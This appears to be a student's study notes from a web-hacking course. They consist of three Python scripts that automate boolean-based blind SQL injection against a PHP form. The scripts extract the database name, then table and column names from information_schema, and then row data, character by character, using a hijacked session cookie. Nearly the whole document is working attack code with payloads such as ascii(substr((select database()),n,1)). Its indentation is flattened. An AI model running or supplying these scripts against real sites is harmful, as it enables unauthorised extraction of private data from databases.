DB.py(DB이름추출 ASCII로 나타냄)
import requests
url = input("url 입력: ")
print("Data정보")
ID = input("ID 입력: ")
print("hearer 정보")
print(" 큰따옴표 제거 ")
userAgent = input("User-Agent: ")
print("value값만")
cookie= input("PHPSESSID: ")
filterWord=input("filterWord: ")
DBNum=1
while True:
blind=(f"{ID}' and (ascii(substr((select database()),{DBNum},1)) >0) and '1'='1")
data={
'query' : f'{blind}',
}
header={
"User-Agent" : f'{userAgent}',
"Cookie" : f'PHPSESSID={cookie}'
}
response=requests.post(url,data=data,headers=header)
if filterWord in response.text:
print("\r")
print("자리 수: " + str(DBNum-1))
break
DBNum +=1
tn=1
while tn < DBNum :
num=32
# tn이 새로 설정될떄 마다 32로 초기화 할려고 while안에 넣음 안넣으면 초기화안되서 같은결과만나옴
while True :
blind=(f"{ID}' and (ascii(substr((select database()),{tn},1)) >{num}) and '1'='1")
data={
'query' : f'{blind}',
}
header={
"User-Agent" : f'{userAgent}',
"Cookie" : f'PHPSESSID={cookie}'
}
response=requests.post(url,data=data,headers=header)
# print(response.text)
if filterWord in response.text:
if(num==32):
print("No")
exit()
else:
# os.system('cls' if os.name == 'nt' else 'clear')
print(str(num)+", ",end='')
break
num +=1
tn += 1
print("Done")
Table & Column.py(Table과 column이름 추출 ASCII코드로 나타냄)
import requests
import os
url=input("url 입력: ")
## print("DATA 정보")
ID = input("ID 입력: ")
DB_NAME= input("DB_NAME: ")
print("hearer 정보")
print(" 큰따옴표 제거 ")
userAgent = input("User-Agent: ")
print("value값만")
cookie= input("PHPSESSID: ")
filterWord=input("filterWord: ")
print("1: table, 2: column")
choice=input("숫자를 선택하세요")
if(choice=="1"):
choice="table"
else:
choice="column"
limitNum=0
while(True):
# print(limitNum)
check=(f"{ID}' and (ascii(substr((select {choice}_name from information_schema.{choice}s where table_schema='{DB_NAME}' limit {limitNum},1),1,1)) >0) and '1'='1")
data={
'query' : f'{check}',
}
header={
"User-Agent" : f'{userAgent}',
"Cookie" : f'PHPSESSID={cookie}'
}
response=requests.post(url,data=data,headers=header)
if filterWord in response.text:
break
limitNum +=1
print("갯수: " + str(limitNum))
a=0
while a < limitNum:
DBNum=1
while(True):
# print("DB")
check=(f"{ID}' and (ascii(substr((select {choice}_name from information_schema.{choice}s where table_schema='{DB_NAME}' limit {a},1),{DBNum},1)) >0) and '1'='1")
data={
'query' : f'{check}',
}
header={
"User-Agent" : f'{userAgent}',
"Cookie" : f'PHPSESSID={cookie}'
}
response=requests.post(url,data=data,headers=header)
if filterWord in response.text:
print("\r")
print("자리 수: " + str(DBNum-1))
break
DBNum +=1
tn=1
while tn < DBNum :
num=32
# tn이 새로 설정될떄 마다 32로 초기화 할려고 while안에 넣음 안넣으면 초기화안되서 같은결과만나옴
while True :
blind=(f"{ID}' and (ascii(substr((select {choice}_name from information_schema.{choice}s where table_schema='{DB_NAME}' limit {a},1),{tn},1)) >{num}) and '1'='1")
data={
'query' : f'{blind}',
}
header={
"User-Agent" : f'{userAgent}',
"Cookie" : f'PHPSESSID={cookie}'
}
response=requests.post(url,data=data,headers=header)
# print(response.text)
if filterWord in response.text:
if(num==32):
print("No")
break
else:
print(str(num) + ", " , end='')
break
else:
num +=1
continue
tn += 1
a +=1
print("Done")data.py(추출한 Table이름과 column이름으로 데이터 추출)
import requests
url = input("url 입력: ")
print("Data정보")
ID = input("ID 입력: ")
print("hearer 정보")
print(" 큰따옴표 제거 ")
userAgent = input("User-Agent: ")
print("value값만")
cookie= input("PHPSESSID: ")
print("추출 DATA")
table= input("table: ")
column= input("column: ")
filterWord=input("filterWord: ")
cNum=0
while True:
print(cNum)
blind=f"{ID}' and (ascii(substr((select {column} from {table} limit {cNum},1),1,1))>0) and '1'='1"
data={
'query' : f'{blind}',
}
header={
'User-Agent' : f'{userAgent}',
'Cookie' : f'PHPSESSID={cookie}'
}
response=requests.post(url, data=data, headers=header)
if filterWord in response.text:
break
cNum += 1
print("갯수:" + str(cNum))
a = 0
vNum = 1
while a < cNum:
while True:
blind=f"{ID}' and (ascii(substr((select {column} from {table} limit {a},1),{vNum},1))>0) and '1'='1"
data={
'query' : f'{blind}',
}
header={
'User-Agent' : f'{userAgent}',
'Cookie' : f'PHPSESSID={cookie}'
}
response=requests.post(url, data=data, headers=header)
if filterWord in response.text:
print("자리수:" + str(vNum))
break
vNum += 1
b=1
while b <= vNum:
Num=32
while True:
blind=f"{ID}' and (ascii(substr((select {column} from {table} limit {a},1),{b},1))>{Num}) and '1'='1"
data={
'query' : f'{blind}',
}
header={
'User-Agent' : f'{userAgent}',
'Cookie' : f'PHPSESSID={cookie}'
}
response=requests.post(url, data=data, headers=header)
if filterWord in response.text:
if(Num == 32):
print("Nothing")
break
else:
print(str(Num) + ", ", end='')
break
Num += 1
b += 1
a += 1Login과 차이점
- data 정보에서 query로 파라미터 설정
- input에서 password를 뺌
--Normaltic Study 7주차--
